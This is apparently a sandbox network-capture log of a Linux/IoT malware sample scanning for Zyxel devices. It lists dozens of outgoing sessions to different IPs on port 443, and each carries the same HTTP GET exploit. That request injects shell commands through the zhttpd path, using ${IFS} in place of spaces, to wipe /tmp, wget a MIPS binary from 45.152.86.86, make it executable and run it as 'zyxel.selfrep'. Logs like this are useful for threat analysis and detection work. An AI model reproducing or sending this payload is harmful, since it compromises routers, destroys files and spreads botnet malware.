                              Mar 31, 2024 08:41:14.661434889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2492192.168.2.1350528107.24.31.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661474943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2493192.168.2.1343810165.155.186.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661525011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2494192.168.2.1333156147.210.181.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661572933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2495192.168.2.1336986122.118.239.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661633015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2496192.168.2.1349324205.71.82.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661672115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2497192.168.2.1343800216.54.156.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661725044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2498192.168.2.1342444131.187.157.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661778927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2499192.168.2.1355594210.21.84.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661850929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2500192.168.2.133576631.27.224.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661875963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2501192.168.2.133796271.251.44.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661928892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2502192.168.2.1345800108.60.96.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.661994934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2503192.168.2.1343690168.227.161.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662039042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2504192.168.2.1359510219.221.182.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662094116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2505192.168.2.133747431.240.181.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662154913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2506192.168.2.133758298.36.19.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662189960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2507192.168.2.1341226203.140.193.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662256002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2508192.168.2.135313082.33.164.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662290096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2509192.168.2.1333828160.112.80.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662380934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2510192.168.2.1337776138.147.114.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662408113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2511192.168.2.1338904147.210.249.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662431002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2512192.168.2.133789631.112.87.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662470102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2513192.168.2.133389469.68.4.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662511110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2514192.168.2.1334728112.209.19.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662566900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2515192.168.2.1338510139.37.241.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662620068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2516192.168.2.134607892.29.205.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662673950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2517192.168.2.1356160187.156.135.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662708998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2518192.168.2.135555232.130.59.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662763119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2519192.168.2.1347404197.212.251.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662836075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2520192.168.2.1350290115.160.204.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662885904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2521192.168.2.1356632114.185.126.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662924051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2522192.168.2.1348370168.4.254.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.662992954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2523192.168.2.133311089.123.35.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663032055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2524192.168.2.1334434170.200.13.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663058996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2525192.168.2.1352524218.220.224.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663126945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2526192.168.2.1351316134.57.181.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663186073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2527192.168.2.1346476165.252.1.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663232088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2528192.168.2.13334461.156.188.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663260937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2529192.168.2.1359732138.232.33.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663321018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2530192.168.2.134416282.27.149.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663369894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2531192.168.2.1348742201.55.57.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663415909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2532192.168.2.1358286113.92.125.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663458109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2533192.168.2.1333932148.128.69.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663522005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2534192.168.2.1355428170.28.92.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663561106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2535192.168.2.135422878.73.51.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663604975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2536192.168.2.1334140187.131.63.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663650036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2537192.168.2.134147864.117.25.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663729906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2538192.168.2.1341852136.106.100.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663779020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2539192.168.2.1341942206.231.181.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663831949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2540192.168.2.1346732141.86.179.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663891077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2541192.168.2.1353154160.83.10.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663950920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2542192.168.2.1336094163.64.153.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.663984060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2543192.168.2.1349756101.18.196.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664026022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2544192.168.2.1348982154.240.95.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664052010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2545192.168.2.1337024223.218.172.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664083004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2546192.168.2.1338982148.0.154.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664136887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2547192.168.2.1352280175.76.133.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664226055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2548192.168.2.1356374184.69.35.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664277077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2549192.168.2.133350289.122.67.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664349079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2550192.168.2.1341366151.14.255.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664396048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2551192.168.2.135430244.207.221.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664436102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2552192.168.2.134513648.155.74.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664505959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2553192.168.2.13609262.69.202.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664577961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2554192.168.2.13427025.12.148.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664629936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2555192.168.2.1335046110.189.120.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664675951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2556192.168.2.1354416175.107.125.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664756060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2557192.168.2.1360272197.167.174.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664792061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2558192.168.2.1339898199.248.246.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664823055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2559192.168.2.1360978202.106.152.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.664901972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2560192.168.2.1353792149.5.7.49443
                              TimestampBytes transferredDirectionData
